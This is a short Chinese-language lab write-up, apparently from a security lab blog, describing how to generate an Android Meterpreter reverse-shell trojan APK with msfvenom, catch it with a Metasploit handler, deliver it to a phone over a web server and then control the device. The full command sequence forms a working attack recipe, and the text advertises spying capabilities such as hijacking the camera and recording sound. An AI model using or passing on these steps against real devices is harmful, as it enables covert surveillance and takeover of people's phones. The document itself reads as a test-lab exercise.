实验环境:Kali Linux 2016.1;IP:192.168.0.105。
受害主机:华为Ascend P7 Android 4.x;IP:192.168.0.102。
实验过程:
1.运行msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105
LPORT=1234 R > test.apk;
2.运行msfconsole,输入use exploit/multi/handler;
3.执行set PAYLOAD android/meterpreter/reverse_tcp;
4.执行show options,将本地IP和端口号修改成和木马一样的参数;
5.将test.apk通过Kali的apache服务器下载到受害主机上;
6.在metasploit中执行exploit,之后在安卓手机中安装test.apk;
7.可以看到,安装apk之后,我们得到了受害主机的meterpreter;
8.我们可以在meterpreter下执行任何命令,例如检查是否root,列出当前进程,甚至劫持摄像头,录制声音等等。
Safesonic网络安全实验室2016年08月13日
网友评论